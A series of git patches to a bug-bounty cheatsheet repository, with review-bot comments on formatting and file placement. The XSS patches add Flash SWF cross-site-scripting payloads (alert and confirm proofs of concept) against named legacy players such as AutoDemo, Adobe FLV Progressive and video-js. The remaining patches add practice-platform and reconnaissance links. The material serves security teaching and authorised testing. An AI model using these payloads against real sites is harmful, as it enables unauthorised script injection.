From 74b9508019a8872b0a877478b8f3cd9f1a43dd6a Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Sun, 1 Oct 2017 10:19:34 +0100 Subject: [PATCH 1/8] [XSS] add extra SWF refs from notes --- cheatsheets/xss.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 9fd8b26..c2d7b76 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -128,6 +128,10 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` +- AutoDemo: `control.swf?onend=javascript:alert(1)//` + +- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//` + - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` @@ -136,7 +140,7 @@ javas cript://www.google.com/%0Aalert(1) - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` -_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ +_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ **Lightweight Markup Languages** From 77f7f160372883bee305f977347579c60b5327cb Mon Sep 17 00:00:00 2001 From: Martijn X1M Date: Sun, 1 Oct 2017 16:10:28 +0200 Subject: [PATCH 2/8] added practice platforms --- cheatsheets/practice-platforms.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 cheatsheets/practice-platforms.md diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md new file mode 100644 index 0000000..22dcb8f --- /dev/null +++ b/cheatsheets/practice-platforms.md 
@@ -0,0 +1,5 @@ +## Practice Platforms + +- [Pentesterlab](https://pentesterlab.com/) +- [XSS Game](https://xss-game.appspot.com/) +- [Hack This Site](https://www.hackthissite.org) From bdc7d94601a737d6786839b11b3bea46386ae9cd Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Sun, 1 Oct 2017 16:22:37 +0200 Subject: [PATCH 3/8] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 921f75d..6762a76 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,7 @@ - [Books](cheatsheets/books.md) - [Special Tools](cheatsheets/special-tools.md) - [Recon](cheatsheets/recon.md) +- [Practice Platforms](cheatsheets/practice-platforms.md) - [XSS](cheatsheets/xss.md) - [SQLI](cheatsheets/sqli.md) - [SSRF](cheatsheets/ssrf.md) From 41adf2c5ba9f467f7723d415c94b536bfa84dc35 Mon Sep 17 00:00:00 2001 From: nodauf Date: Sun, 1 Oct 2017 20:09:43 +0200 Subject: [PATCH 4/8] Add new pratice platforms --- cheatsheets/practice-platforms.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md index 22dcb8f..cff88c5 100644 --- a/cheatsheets/practice-platforms.md +++ b/cheatsheets/practice-platforms.md @@ -3,3 +3,5 @@ - [Pentesterlab](https://pentesterlab.com/) - [XSS Game](https://xss-game.appspot.com/) - [Hack This Site](https://www.hackthissite.org) +- [Root-Me](https://www.root-me.org) +- [HackTheBox](https://www.hackthebox.eu) From b874b1a5c5214fbd9f925cd47d51223107126ead Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Sun, 1 Oct 2017 20:20:23 +0200 Subject: [PATCH 5/8] Add link to contributors page. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 6762a76..ee987dd 100644 --- a/README.md +++ b/README.md 
@@ -54,3 +54,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) +- [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) From b8f3aa96e31a428b34c7601f31cd8873b03a3939 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Sun, 1 Oct 2017 22:04:49 +0100 Subject: [PATCH 6/8] [XSS] add video-js example variant --- cheatsheets/xss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index c2d7b76..26f0eae 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -120,7 +120,7 @@ javas cript://www.google.com/%0Aalert(1) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` -- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` +- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` From 836b8b9a66d64d4fccdfa3ba7a433cc37ecf36b2 Mon Sep 17 00:00:00 2001 From: Nullsxcurity <32492630+Nullsxcurity@users.noreply.github.com> Date: Wed, 4 Oct 2017 13:00:18 +0530 Subject: [PATCH 7/8] Added HackMe & CTF 365 to the list --- cheatsheets/practice-platforms.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md index cff88c5..fdd8259 100644 --- a/cheatsheets/practice-platforms.md +++ b/cheatsheets/practice-platforms.md @@ -5,3 +5,5 @@ - [Hack This Site](https://www.hackthissite.org) - [Root-Me](https://www.root-me.org) - [HackTheBox](https://www.hackthebox.eu) +- [Hack Me](https://hack.me) +- [CTF 365](https://ctf365.com) From 61d3641a4c0d81229167df3c19d70ee0d20d6997 Mon Sep 17 00:00:00 2001 
From: Nullsxcurity <32492630+Nullsxcurity@users.noreply.github.com> Date: Wed, 4 Oct 2017 13:15:20 +0530 Subject: [PATCH 8/8] Updated Reconnaissance list in special-tools.md Added PenTest tools to the list, recon using Google dorks. --- cheatsheets/special-tools.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index a354f6a..6ca80d3 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -38,6 +38,7 @@ otherapp.10.0.0.1.nip.io - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) +- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks) **Report Templates**
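Review bot: In PATCH 1/8, the two new `cheatsheets/xss.md` entries (AutoDemo and Adobe FLV Progressive) carry no version or advisory qualifier, whereas the surrounding entries do ("JWPlayer (legacy)", "FlowPlayer 3.2.7"); add the affected version or a reference so a reader auditing a site can tell which shipped SWF files are the vulnerable ones rather than treating every `control.swf` or `FLVPlayer_Progressive.swf` as affected. The reworded note in the second hunk ("constructing Flash-based XSS payloads") reads fine.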
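Review bot: In PATCH 2/8, the new `cheatsheets/practice-platforms.md` opens with a `## Practice Platforms` heading, while the other cheatsheets visible in this series use bold section labels (`**Lightweight Markup Languages**` in `xss.md`, `**Report Templates**` in `special-tools.md`); since the README hunk in PATCH 5/8 states "We like to keep our Markdown files as uniform as possible", pick one heading style for the new file that matches the existing sheets.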
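Review bot: In PATCH 3/8, the new `- [Practice Platforms](cheatsheets/practice-platforms.md)` line is inserted between "Recon" and "XSS", which are vulnerability-class and methodology sheets; a list of training sites belongs with the other resource entries ("Books", "Special Tools") at the top of the list, so consider moving it up two lines.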
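Review bot: In PATCH 4/8, the commit subject misspells "practice" as "pratice"; the hunk itself (Root-Me and HackTheBox appended to `practice-platforms.md`) follows the existing list format and needs no change.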
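Review bot: In PATCH 6/8, the changed videoJS line wraps both payload variants in backticks, but the unchanged context line two lines above (`- FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert\`1\``) leaves its payload unfenced, and the `%gn` fragment in it looks like a broken percent-encoding that should be verified against the original source; since this hunk already touches the block, fence that line the same way so Markdown does not mangle the backtick-quoted `alert\`1\``.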
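Review bot: In PATCH 8/8, the commit subject says it updates the "Reconnaissance list in special-tools.md", but the README hunk in PATCH 3/8 shows a separate `cheatsheets/recon.md` sheet; confirm that the Google-dork link belongs in `special-tools.md` rather than `recon.md` so the same category of resource is not split across two files. The added line matches the neighbouring `- [Name](url) (description)` format.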